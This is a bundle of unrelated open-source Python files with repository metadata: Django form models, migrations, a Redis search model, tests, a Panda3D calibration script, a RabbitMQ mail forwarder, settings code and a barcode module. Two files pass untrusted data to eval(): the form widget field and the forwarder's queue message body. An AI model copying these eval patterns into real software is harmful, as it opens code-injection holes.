queryset = ModelNameField.get_model_from_string(self.choice_model).objects.all()
if order_by:
queryset = queryset.order_by(order_by)
return [FieldChoiceContainer(value=item.id, label=item.title) for item in queryset]
else:
return self.choices.order_by('value')
#--------------------------------------------------------------------------
def get_form_field_init_args(self):
args = {
'required': self.required,
'label': self.label if self.label else '',
'initial': self.initial if self.initial else None,
'help_text': self.help_text,
}
if self.field_class in ('forms.CharField', 'forms.EmailField', 'forms.RegexField'):
args.update({
'max_length': self.max_length,
'min_length': self.min_length,
})
if self.field_class in ('forms.IntegerField', 'forms.DecimalField'):
args.update({
'max_value': int(self.max_value) if self.max_value != None else None,
'min_value': int(self.min_value) if self.min_value != None else None,
})
if self.field_class == 'forms.DecimalField':
args.update({
'max_value': self.max_value,
'min_value': self.min_value,
'max_digits': self.max_digits,
'decimal_places': self.decimal_places,
})
if self.field_class == 'forms.RegexField':
if self.regex:
args.update({
'regex': self.regex
})
if self.field_class in ('forms.ChoiceField', 'forms.MultipleChoiceField'):
#print "Choices count:", self.choices.count()
if self.choices.count():
# new method of creating choices
choices = [(choice.value, choice.label) for choice in self.choices.all()]
args.update({
'choices': tuple(choices)
})
#print "Choices:", choices
if self.field_class in ('forms.ModelChoiceField', 'forms.ModelMultipleChoiceField'):
args.update({
'queryset': ModelNameField.get_model_from_string(self.choice_model).objects.all()
})
if self.field_class == 'forms.ModelChoiceField':
args.update({
'empty_label': self.choice_model_empty_label
})
if self.widget:
args.update({
'widget': eval(self.widget)()
})
return args
#--------------------------------------------------------------------------
class Meta:
verbose_name = _('field')
verbose_name_plural = _('fields')
ordering = ['position']
#--------------------------------------------------------------------------
def __unicode__(self):
return self.label if self.label else self.name
#==============================================================================
class FormSubmission(models.Model):
"""
Represents a single submission of a particular type of form definition.
"""
created = models.DateTimeField(_('Created'), auto_now=True)
#--------------------------------------------------------------------------
class Meta:
verbose_name = _('form submission')
verbose_name_plural = _('form submissions')
ordering = ['-created']
#--------------------------------------------------------------------------
def __unicode__(self):
form_definition = self.form_definition
# if this submission has fields attached to it
if form_definition:
return u'%s at %s' % (form_definition, self.created)
else:
return u'Empty submission at %s' % self.created
#--------------------------------------------------------------------------
@property
def form_definition(self):
return self.fields.all()[0].definition_field.form_definition if self.fields.count() else None
#==============================================================================
class FormFieldSubmission(models.Model):
"""
Represents the content of a single submission's field.
"""
submission = models.ForeignKey(FormSubmission, verbose_name=_('Form submission'), help_text=_('The submission to which this particular submission component belongs'),
related_name='fields')
definition_field = models.ForeignKey(FormDefinitionField, verbose_name=_('Form definition field'),
help_text=_('The field in the form definition to which this submitted value belongs'),
related_name='submissions')
value = models.TextField(_('Value'), help_text=_('The actual submitted value'))
#--------------------------------------------------------------------------
def __unicode__(self):
value = u'%s' % self.value
truncated_value = value if len(value) < 10 else value[:10]+'...'
return u'%s: %s (%s)' % (self.definition_field, u'%s=%s' % (truncated_value, self.choice_label) if self.choice_label else truncated_value, self.submission)
#--------------------------------------------------------------------------
@property
def choice_label(self):
"""
Retrieves the label of the choice made by the user, should this
submission's field be linked to a set of choices.
TODO: Account for model choice fields.
"""
try:
# get the first choice that matches the available ones
choice = self.definition_field.choices.filter(value=self.value)[0]
except:
return None
return u'%s' % choice.label
#==============================================================================
if 'cms' in settings.INSTALLED_APPS:
from cms.models import CMSPlugin
class CMSFormDefinition(CMSPlugin):
form_definition = models.ForeignKey(FormDefinition, verbose_name=_('Form'))
def __unicode__(self):
return self.form_definition.__unicode__()
| {
"content_hash": "2651da72192f69733de6c788a468f8f4",
"timestamp": "",
"source": "github",
"line_count": 458,
"max_line_length": 377,
"avg_line_length": 44.52838427947598,
"alnum_prop": 0.5389330195155437,
"repo_name": "praekelt/django-form-designer",
"id": "862d6d7bdc9c8fa87bbc2aa14ed43c58c0ee731a",
"size": "20394",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "form_designer/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('sitecheck', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ApiClientState',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('sleep_until', models.DateTimeField(null=True)),
('max_concurrent_assessments', models.IntegerField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RequestLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('datetime', models.DateTimeField(auto_now_add=True)),
('uuid', models.UUIDField(max_length=32)),
('request_url', models.CharField(max_length=1000)),
('request_headers', models.TextField()),
('request_body', models.TextField(null=True)),
('response_code', models.IntegerField(null=True)),
('response_headers', models.TextField(null=True)),
('response_body', models.TextField(null=True)),
('sitecheck', models.ForeignKey(related_name='requestlogs', to='sitecheck.SiteCheck', null=True, on_delete=models.PROTECT)),
],
options={
'ordering': ['-datetime'],
},
bases=(models.Model,),
),
]
| {
"content_hash": "074b597bc9d1808f502c874f12e69084",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 140,
"avg_line_length": 39.26829268292683,
"alnum_prop": 0.5347826086956522,
"repo_name": "tykling/tlsscout",
"id": "a1cc9947dad048239c7d846e50b93b810d030594",
"size": "1636",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/ssllabs/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52"
},
{
"name": "HTML",
"bytes": "47251"
},
{
"name": "Python",
"bytes": "79561"
}
],
"symlink_target": ""
} |
import logging
from doodle.config import CONFIG
from doodle.core.property import IntegerProperty, StringProperty
from doodle.core.redis_client import redis_cache_client
from .base_model import JSONModel
class KeywordArticle(JSONModel):
keywords = StringProperty()
article_id = IntegerProperty()
def _get_watching_keys(self, inserting=False):
return [self.KEY]
def _save_self(self, redis_client, inserting=False):
member = '%s:%d' % (self.keywords, self.article_id)
redis_client.sadd(self.KEY, member)
def delete(self, redis_client):
member = '%s:%d' % (self.keywords, self.article_id)
redis_client.srem(self.KEY, member)
@classmethod
def query_by_keyword(cls, keyword, result_limit=CONFIG.SEARCH_PAGE_SIZE, search_limit=CONFIG.MAX_SEARCH_COUNT):
cache_key = 'KeywordArticles:' + keyword
cached_result = redis_cache_client.get(cache_key)
if cached_result is not None:
if not cached_result:
return []
try:
article_ids = cached_result.split(',')
return [int(article_id) for article_id in article_ids]
except ValueError:
logging.warning('Key "%s" contains wrong value: %s', cache_key, cached_result)
redis_cache_client.delete(cache_key)
pattern = '*%s*:*' % keyword.lower()
cursor, members = cls.redis_client.sscan(cls.KEY, match=pattern, count=search_limit)
if members:
article_ids = [member.rsplit(':', 1)[-1] for member in members[:result_limit]]
result = [int(article_id) for article_id in article_ids]
else:
article_ids = result = []
redis_cache_client.set(cache_key, ','.join(article_ids), ex=CONFIG.DEFAULT_CACHE_TIME)
return result
| {
"content_hash": "960481cde0ac790163379f274e539c26",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 115,
"avg_line_length": 37.53061224489796,
"alnum_prop": 0.6302338227297444,
"repo_name": "keakon/Doodle",
"id": "1c3e4b60b760a917f64869badc26e0447f7b250e",
"size": "1864",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doodle/core/models/keyword.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "42340"
},
{
"name": "Dockerfile",
"bytes": "396"
},
{
"name": "HTML",
"bytes": "29675"
},
{
"name": "JavaScript",
"bytes": "60604"
},
{
"name": "Python",
"bytes": "174982"
}
],
"symlink_target": ""
} |
from django.apps import AppConfig
class SocialAppConfig(AppConfig):
name = "social"
def ready(self):
import social.signals | {
"content_hash": "fe661f5042bacdeafc23ce233c6d426b",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 33,
"avg_line_length": 17.625,
"alnum_prop": 0.7021276595744681,
"repo_name": "eyohansa/temu",
"id": "beb6626b0cdbf805c46fe92591f10934bca81f0a",
"size": "141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "social/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "817"
},
{
"name": "HTML",
"bytes": "16452"
},
{
"name": "JavaScript",
"bytes": "2806"
},
{
"name": "Python",
"bytes": "20802"
}
],
"symlink_target": ""
} |
import pytest
from api.base.settings.defaults import API_BASE
from osf_tests.factories import (
RegistrationProviderFactory,
AuthUserFactory
)
from django.contrib.auth.models import Group
from osf.models import RegistrationSchema
from waffle.models import Flag
from osf.migrations import update_provider_auth_groups
from osf.features import EGAP_ADMINS
@pytest.mark.django_db
class TestRegistrationProviderSchemas:
@pytest.fixture()
def user(self):
return AuthUserFactory()
@pytest.fixture()
def egap_flag(self):
flag = Flag.objects.get(name='egap_admins')
flag.everyone = True
flag.save()
return flag
@pytest.fixture()
def schema(self):
return RegistrationSchema.objects.get(name='Prereg Challenge', schema_version=2)
@pytest.fixture()
def egap_schema(self):
return RegistrationSchema.objects.get(name='EGAP Registration', schema_version=3)
@pytest.fixture()
def out_dated_schema(self):
reg_schema = RegistrationSchema(name='Prereg Challenge', schema_version=1)
reg_schema.save()
return reg_schema
@pytest.fixture()
def invisible_schema(self):
reg_schema = RegistrationSchema(name='Test Schema (Invisible)', schema_version=1, visible=False)
reg_schema.save()
return reg_schema
@pytest.fixture()
def inactive_schema(self):
reg_schema = RegistrationSchema(name='Test Schema (Inactive)', schema_version=1, active=False)
reg_schema.save()
return reg_schema
@pytest.fixture()
def provider(self, schema, out_dated_schema, invisible_schema, inactive_schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(*[schema, out_dated_schema, invisible_schema, inactive_schema])
provider.save()
return provider
@pytest.fixture()
def provider_with_v2_prereg_only(self, schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(schema)
provider.save()
return provider
@pytest.fixture()
def provider_with_egap_only(self, egap_schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(egap_schema)
provider.save()
return provider
@pytest.fixture
def egap_admin(self):
user = AuthUserFactory()
user.save()
flag = Flag.objects.get(name=EGAP_ADMINS)
group = Group.objects.create(name=EGAP_ADMINS) # Just using the same name for convenience
flag.groups.add(group)
group.user_set.add(user)
group.save()
flag.save()
return user
@pytest.fixture()
def url(self, provider):
return f'/{API_BASE}providers/registrations/{provider._id}/schemas/'
@pytest.fixture()
def url_with_v2_prereg_only(self, provider_with_v2_prereg_only):
return f'/{API_BASE}providers/registrations/{provider_with_v2_prereg_only._id}/schemas/'
@pytest.fixture()
def url_with_egap_only(self, provider_with_egap_only):
return f'/{API_BASE}providers/registrations/{provider_with_egap_only._id}/schemas/'
def test_registration_provider_with_schema(
self,
app,
url,
schema,
egap_schema,
egap_admin,
invisible_schema,
user,
url_with_v2_prereg_only,
url_with_egap_only
):
res = app.get(url, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 2
assert schema._id in [item['id'] for item in data]
assert invisible_schema._id in [item['id'] for item in data]
assert schema.name in [item['attributes']['name'] for item in data]
res = app.get(url_with_v2_prereg_only, auth=egap_admin.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == schema._id
assert data[0]['attributes']['name'] == schema.name
res = app.get(url_with_egap_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_egap_registration_schema(
self,
app,
user,
egap_admin,
egap_schema,
url_with_egap_only
):
res = app.get(url_with_egap_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
res = app.get(url_with_egap_only, auth=egap_admin.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == egap_schema._id
assert data[0]['attributes']['name'] == egap_schema.name
| {
"content_hash": "411a910766815ccc62d4203749aa454e",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 104,
"avg_line_length": 30.763975155279503,
"alnum_prop": 0.6208358570563295,
"repo_name": "baylee-d/osf.io",
"id": "434a240c7ec195152df440ff299caa0889475477",
"size": "4953",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "api_tests/providers/registrations/views/test_registration_provider_schemas.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "92773"
},
{
"name": "Dockerfile",
"bytes": "5721"
},
{
"name": "HTML",
"bytes": "318459"
},
{
"name": "JavaScript",
"bytes": "1792442"
},
{
"name": "Jupyter Notebook",
"bytes": "41326"
},
{
"name": "Mako",
"bytes": "654930"
},
{
"name": "Python",
"bytes": "10662092"
},
{
"name": "VCL",
"bytes": "13885"
}
],
"symlink_target": ""
} |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name = 'stager',
version = '0.0.1',
description = 'the perfect Gentoo installer',
url = 'https://github.com/gentoo/stager',
author = 'Matthew Marchese',
author_email = '[email protected]',
license = 'To be determined...',
keywords = 'gentoo installer development',
packages = ['stager'],
install_requires = [''],
py_modules=['stager'],
)
| {
"content_hash": "65d8d7818457727a6c2864884b8bdd9c",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 49,
"avg_line_length": 27.22222222222222,
"alnum_prop": 0.6408163265306123,
"repo_name": "DigitalSurvival/kaudit",
"id": "411515e3be33e20565e888b8a6a8bf386c863116",
"size": "516",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "962"
}
],
"symlink_target": ""
} |
from __future__ import division
from direct.showbase.ShowBase import ShowBase
from direct.showbase.DirectObject import DirectObject
from panda3d.core import Point3, NodePath, LineSegs
from panda3d.core import OrthographicLens
from positions import Positions
from panda3d.core import WindowProperties
from positions import visual_angle
import numpy as np
import sys
class World(DirectObject):
def __init__(self):
# Program just to demonstrate where we are putting the positions for calibration
# Unlike the actual calibration routine, can see all of the squares at once
DirectObject.__init__(self)
#ShowBase.__init__(self)
self.base = ShowBase()
#print self.base.win.getRejectedProperties()
self.config = {}
#execfile('config_test.py', self.config)
execfile('config.py', self.config)
resolution = self.config['WIN_RES']
if not resolution or resolution == 'Test':
#print 'test'
# assume testing, small window
resolution = (800, 600)
print resolution
wp = WindowProperties()
wp.setSize(int(resolution[0]), int(resolution[1]))
wp.setOrigin(0, 0)
wp.setUndecorated(True)
self.base.win.requestProperties(wp)
# depth completely doesn't matter for this, since just 2d, and no layers
#self.depth = 55
self.depth = 0
self.base.setBackgroundColor(115/255, 115/255, 115/255)
# set up a 2d camera
camera = self.base.camList[0]
lens = OrthographicLens()
#print 'xwin', self.base.win.getProperties().getXSize()
lens.setFilmSize(int(resolution[0]), int(resolution[1]))
lens.setNearFar(-100, 100)
camera.node().setLens(lens)
# reparent it to pixel2d, so renders in pixel coordinates
camera.reparentTo(self.base.render)
#print 'xwin2', self.base.win.getXSize()
#print self.base.win.getYSize()
#print camera.ls()
self.accept("escape", sys.exit)
self.accept('space', self.next)
self.accept('a', self.all)
self.accept('d', self.degree_positions)
self.accept('s', self.change_square_size)
self.mode = 0
self.pos = []
#self.root = self.base.render.attachNewNode("Root")
self.make_circle()
def next(self):
#print 'xwin', self.base.win.getProperties().getXSize()
if self.mode == 0:
self.pos = Positions(self.config).get_position(self.depth, 'small')
self.mode = 1
square = self.make_square()
try:
square.setPos(Point3(self.pos.next()))
print square.getPos()
except StopIteration:
print 'done'
#square.setColor(175 / 255, 175 / 255, (i * 7) / 255, 1.0)
#print square.getColor()
def all(self):
pos = None
if self.mode == 0:
self.make_circle()
pos = Positions(self.config).get_position(self.depth)
self.mode = 1
#print pos
#for i, j in enumerate(pos):
while True:
try:
position = pos.next()
except StopIteration:
break
square = self.make_square()
square.setPos(Point3(position))
#print square.getPos()
#print square.getTightBounds()
#sq_min, sq_max = square.getTightBounds()
#size = sq_max - sq_min
#print size[0], size[2]
def change_square_size(self):
pos = None
if self.mode == 0:
self.config['MAX_DEGREES_X'] = 20
self.config['MAX_DEGREES_Y'] = 20
self.make_circle()
pos = Positions(self.config).get_position(self.depth)
self.mode = 1
res = [1024, 768]
# Screen size
screen = [1337, 991]
v_dist = 1219
b = 0
scale = 1
size_list = []
for i, j in enumerate(pos):
#b += 0.04 # covers all of the values if using 25 points
#b += 0.08
b += 0.03
scale += 0.5
#print b
#print i
#print j
square = self.make_square(scale)
square.setPos(Point3(j))
#print square.getPos()
#print square.getTightBounds()
sq_min, sq_max = square.getTightBounds()
size = sq_max - sq_min
#print size[0], size[2]
deg_per_pixel = visual_angle(screen, res, v_dist)
#print deg_per_pixel
print scale
print 'size in degrees, x', size[0] * deg_per_pixel[0]
print 'size in degrees, y', size[2] * deg_per_pixel[1]
size_list.append(size[0] * deg_per_pixel[0])
print size_list
import pickle
pickle.dump(size_list, open('size_list', 'wb'))
def degree_positions(self):
# set center, than 4 squares in cardinal directions at interval of 5 degree angles
if self.mode == 0:
self.pos = Positions(self.config).get_degree_positions(self.depth)
self.mode = 1
# get the center position
square = self.make_square()
square.setPos(Point3(self.pos.next()))
#print 'first', square.getPos()
else:
try:
for i in range(4):
square = self.make_square()
square.setPos(Point3(self.pos.next()))
print square.getPos()
except StopIteration:
print 'done'
def make_square(self, scale=None):
square = self.base.loader.loadModel("models/plane")
square.reparentTo(self.base.render)
#square.ls()
#square.setScale(0.05)
if scale:
square.setScale(scale)
else:
square.setScale(8.5)
square.setDepthTest(False)
square.setTransparency(1)
square.setTexture(self.base.loader.loadTexture("textures/calibration_square.png"), 1)
# gray
#square.setColor(150 / 255, 150 / 255, 150 / 255, 1.0)
# yellow
#square.setColor(175 / 255, 175 / 255, 130 / 255, 1.0)
square.setColor(0.9, 0.9, 0.6, 1.0)
#print square.getX()
#print square.getY()
#sq_min, sq_max = square.getTightBounds()
#size = sq_max - sq_min
#print size[0], size[2]
return square
def make_circle(self, angle_deg=360):
ls = LineSegs()
angle_radians = np.deg2rad(angle_deg)
# assume visual angle is approximately the same for x and y,
# which probably is not true, maybe need to change
#radius = 1 * Positions().visual_angle()[0]
res = [1024, 768]
# Screen size
screen = [1337, 991]
v_dist = 1219
# number of visual angles want circle radius to be
# (so twice this is the x and y of the square)
angle = 0.25
# visual angle returns degrees per pixel, so invert since
# we want pixel per degree
deg_per_pixel = visual_angle(screen, res, v_dist)
x_radius = angle * 1 / deg_per_pixel[0]
y_radius = angle * 1 / deg_per_pixel[0]
for i in range(50):
a = angle_radians * i / 49
y = y_radius * np.sin(a)
#print y
x = x_radius * np.cos(a)
#print x
ls.drawTo(x, self.depth, y)
#node = ls.create()
node = self.base.render.attachNewNode(ls.create(True))
return NodePath(node)
if __name__ == "__main__":
print 'auto-running'
W = World()
W.base.run()
else:
print 'not auto-running'
| {
"content_hash": "d1b8e35f4c8d7c05e41fae2315fc4fbb",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 93,
"avg_line_length": 35.86976744186047,
"alnum_prop": 0.5560165975103735,
"repo_name": "codedragon/calibrate",
"id": "1b17c7bf3a0acfef293bed2bce8e29f374ba8ee2",
"size": "7712",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "check_positions.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "148793"
},
{
"name": "Shell",
"bytes": "1043"
}
],
"symlink_target": ""
} |
import pika
import smtplib
def email(FROM,TO,message,gmail_user,gmail_pwd):
server = smtplib.SMTP("74.125.22.108", 587)
server.ehlo()
server.starttls()
server.login(gmail_user, gmail_pwd)
server.sendmail(FROM, TO, message)
server.close()
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.queue_declare(queue='hello')
print ' [*] Waiting for messages. To exit press CTRL+C'
def callback(ch, method, properties, body):
data=eval(body)
email(data['FROM'],data['TO'],data['message'],data['gmail_user'],data['gmail_pwd'])
print "sent email"
channel.basic_consume(callback,
queue='hello',
no_ack=True)
channel.start_consuming()
| {
"content_hash": "adace9545134501bf10d126f6d027d05",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 87,
"avg_line_length": 27.20689655172414,
"alnum_prop": 0.6628643852978454,
"repo_name": "deathping1994/sendmail-api",
"id": "2ada6877ffcebe7e8b2b04cbae555cfbea34abe9",
"size": "789",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "forward.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "20694"
},
{
"name": "CSS",
"bytes": "6111"
},
{
"name": "HTML",
"bytes": "449"
},
{
"name": "JavaScript",
"bytes": "6345"
},
{
"name": "Python",
"bytes": "5285925"
},
{
"name": "Shell",
"bytes": "3759"
}
],
"symlink_target": ""
} |
import json
import os
import logging
import argparse
from copy import deepcopy
from random import randint
default_path = "data/settings.json"
class Settings:
def __init__(self, path=default_path):
self.path = path
self.default_settings = {
"TOKEN": None,
"EMAIL": None,
"PASSWORD": None,
"OWNER": None,
"PREFIXES": [],
"default": {"ADMIN_ROLE": ["Daddy"],
"MOD_ROLE": ["Deds"],
"PREFIXES": []}
}
self.logger = logging.getLogger("Conf")
self.current = self._load_json()
self.self_bot = False
def parse_cmd_arguments(self):
parser = argparse.ArgumentParser(description="FociePlays - Deds Bot")
parser.add_argument("--owner", help="ID of the owner. Only who hosts "
"FociePlaysDeds should be owner, this has "
"security implications")
parser.add_argument("--admin-role", help="Role seen as admin role by the bot")
parser.add_argument("--mod-role", help="Role seen as mod role by the bot")
def _load_json(self):
current = None
try:
with open(self.path, encoding='utf-8', mode="r") as f:
current = json.load(f)
except: #Assume data is crap and recreate
self.current = deepcopy(self.default_settings)
self._save_json()
if current.keys() != self.default_settings.keys():
for key in self.default_settings.keys():
if key not in current.keys():
current[key] = self.default_settings[key]
print("Adding " + str(key) +
" field to red settings.json")
self.current = current
self._save_json()
return current
def _save_json(self):
rnd = randint(1000, 9999)
fpath, ext = os.path.splitext(self.path)
tmp_file = "{}-{}.tmp".format(fpath, rnd)
try:
with open(tmp_file, encoding='utf-8', mode="w") as f:
json.dump(self.current, f, indent=4, sort_keys=True,
separators=(',', ' : '))
except json.decoder.JSONDecodeError:
self.logger.exception("Attempted to write file {} but JSON "
"integrity check on tmp file has failed. "
"The original file is unaltered."
"".format(self.path))
return False
os.replace(tmp_file, self.path)
@property
def mod_role(self):
return self.current["MOD_ROLE"]
@property
def admin_role(self):
return self.current["ADMIN_ROLE"]
@property
def spec_roles(self):
return set(self.mod_role) | set(self.admin_role)
@property
def owner(self):
return self.current["OWNER"]
@owner.setter
def owner(self, value):
self.current["OWNER"] = value
@property
def token(self):
return os.environ.get("RED_TOKEN", self.current["TOKEN"])
@token.setter
def token(self, value):
self.current["TOKEN"] = value
self.current["EMAIL"] = None
self.current["PASSWORD"] = None
@property
def email(self):
return os.environ.get("RED_EMAIL", self.current["EMAIL"])
@email.setter
def email(self, value):
self.current["EMAIL"] = value
self.current["TOKEN"] = None
@property
def password(self):
return os.environ.get("RED_PASSWORD", self.current["PASSWORD"])
@password.setter
def password(self, value):
self.current["PASSWORD"] = value
@property
def login_credentials(self):
if self.token:
return (self.token,)
elif self.email and self.password:
return (self.email, self.password)
else:
return tuple()
| {
"content_hash": "9413ed569723937e253044827510eb59",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 87,
"avg_line_length": 31.984,
"alnum_prop": 0.5377688844422212,
"repo_name": "LogicaExMachina/FoxDedsBot",
"id": "ba68b060fbe07fa376d88c9fcc430bcfd18e1f9e",
"size": "3998",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Settings/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "15953"
}
],
"symlink_target": ""
} |
import sys
from voluptuous.error import LiteralInvalid, TypeInvalid, Invalid
from voluptuous.schema_builder import Schema, default_factory, raises
from voluptuous import validators
__author__ = 'tusharmakkar08'
def Lower(v):
"""Transform a string to lower case.
>>> s = Schema(Lower)
>>> s('HI')
'hi'
"""
return str(v).lower()
def Upper(v):
"""Transform a string to upper case.
>>> s = Schema(Upper)
>>> s('hi')
'HI'
"""
return str(v).upper()
def Capitalize(v):
"""Capitalise a string.
>>> s = Schema(Capitalize)
>>> s('hello world')
'Hello world'
"""
return str(v).capitalize()
def Title(v):
"""Title case a string.
>>> s = Schema(Title)
>>> s('hello world')
'Hello World'
"""
return str(v).title()
def Strip(v):
"""Strip whitespace from a string.
>>> s = Schema(Strip)
>>> s(' hello world ')
'hello world'
"""
return str(v).strip()
class DefaultTo(object):
"""Sets a value to default_value if none provided.
>>> s = Schema(DefaultTo(42))
>>> s(None)
42
>>> s = Schema(DefaultTo(list))
>>> s(None)
[]
"""
def __init__(self, default_value, msg=None):
self.default_value = default_factory(default_value)
self.msg = msg
def __call__(self, v):
if v is None:
v = self.default_value()
return v
def __repr__(self):
return 'DefaultTo(%s)' % (self.default_value(),)
class SetTo(object):
"""Set a value, ignoring any previous value.
>>> s = Schema(validators.Any(int, SetTo(42)))
>>> s(2)
2
>>> s("foo")
42
"""
def __init__(self, value):
self.value = default_factory(value)
def __call__(self, v):
return self.value()
def __repr__(self):
return 'SetTo(%s)' % (self.value(),)
class Set(object):
"""Convert a list into a set.
>>> s = Schema(Set())
>>> s([]) == set([])
True
>>> s([1, 2]) == set([1, 2])
True
>>> with raises(Invalid, regex="^cannot be presented as set: "):
... s([set([1, 2]), set([3, 4])])
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except Exception as e:
raise TypeInvalid(
self.msg or 'cannot be presented as set: {0}'.format(e))
return set_v
def __repr__(self):
return 'Set()'
class Literal(object):
def __init__(self, lit):
self.lit = lit
def __call__(self, value, msg=None):
if self.lit != value:
raise LiteralInvalid(
msg or '%s not match for %s' % (value, self.lit)
)
else:
return self.lit
def __str__(self):
return str(self.lit)
def __repr__(self):
return repr(self.lit)
def u(x):
if sys.version_info < (3,):
return unicode(x)
else:
return x
| {
"content_hash": "e5305f82575f9680ba8f4fd3c4724644",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 72,
"avg_line_length": 19.415584415584416,
"alnum_prop": 0.5163879598662208,
"repo_name": "tuukkamustonen/voluptuous",
"id": "434c360c7e95a90076782850cc917179762ecf83",
"size": "2990",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "voluptuous/util.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "116459"
},
{
"name": "Shell",
"bytes": "1758"
}
],
"symlink_target": ""
} |
import socket
import struct
header_struct = struct.Struct('!I') # message upto 2 ^ 32 -1 in length
def recvall(sock, length):
blocks = []
while length:
block = sock.recv(length)
if not block:
raise EOFError('Socket closed with {} bytes left'.format(length))
length -= len(block)
blocks.append(block)
return b''.join(blocks)
def get_blocks(sock):
data = recvall(sock, header_struct.size)
(block_length, ) = header_struct.unpack(data)
return recvall(sock, block_length)
def put_blocks(sock, message):
block_length = len(message)
sock.send(header_struct.pack(block_length))
sock.send(message)
def server(address):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(1)
print('Run this script in another window with -c option to connect')
print('Listening at', sock.getsockname())
sc, sockname = sock.accept()
print('Accepted connection from', sockname)
sock.shutdown(socket.SHUT_WR)
while True:
block = get_blocks(sc)
if not block:
break
print('Block says:', repr(block))
sc.close()
sock.close()
def client(address):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(address)
sock.shutdown(socket.SHUT_RD)
put_blocks(sock, b'Beautiful is better than ugly.')
put_blocks(sock, b'Explicit is better than implicit')
put_blocks(sock, b'Simple is better than complex')
put_blocks(sock, b'')
sock.close()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='Transmit and Receive blocks over TCP')
parser.add_argument('hostname', nargs='?', default='127.0.0.1',
help='IP address or hostname (default: %(default)s)')
parser.add_argument('-c', action='store_true', help='run as client')
parser.add_argument('-p', type=int, metavar='port', default=1060,
help='TCP port number (default: %(default)s')
args = parser.parse_args()
function = client if args.c else server
function((args.hostname, args.p))
| {
"content_hash": "748b9d9f1b4239d03b0159368f118b36",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 77,
"avg_line_length": 31.507042253521128,
"alnum_prop": 0.6414841305319624,
"repo_name": "gauravssnl/python3-network-programming",
"id": "e21ef19b90b94b632873d20f015157dad3ef29f5",
"size": "2331",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blocks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "64452"
},
{
"name": "Python",
"bytes": "51195"
}
],
"symlink_target": ""
} |
"""UPC module.
:Provided barcodes: UPC-A
"""
from functools import reduce
from .base import Barcode
from .charsets import upc as _upc
from .errors import IllegalCharacterError
from .helpers import sum_chars
class UPCA(Barcode):
"""Class for UPC-A bar codes.
Args:
code (str): UPC-A bar code.
writer (:py:class:`.writer.BaseWriter`): instance of writer class to render the bar code.
"""
name = 'UPC-A'
digits = 12
def __init__(self, code, writer=None):
super(UniversalProductCodeA, self).__init__(code, writer)
@staticmethod
def calculate_checksum(code):
"""Calculates the UPC-A checksum.
Args:
code (str): UPC-A code.
Returns:
(int): UPC-A checksum.
"""
sum_odd = reduce(sum_chars, code[::2])
sum_even = reduce(sum_chars, code[1:-1:2])
check = (sum_even + sum_odd * 3) % 10
if check == 0:
return 0
else:
return 10 - check
@staticmethod
def validate(code):
"""Calculates a UPC-A code checksum.
Args:
code (str): UPC-A code.
Raises:
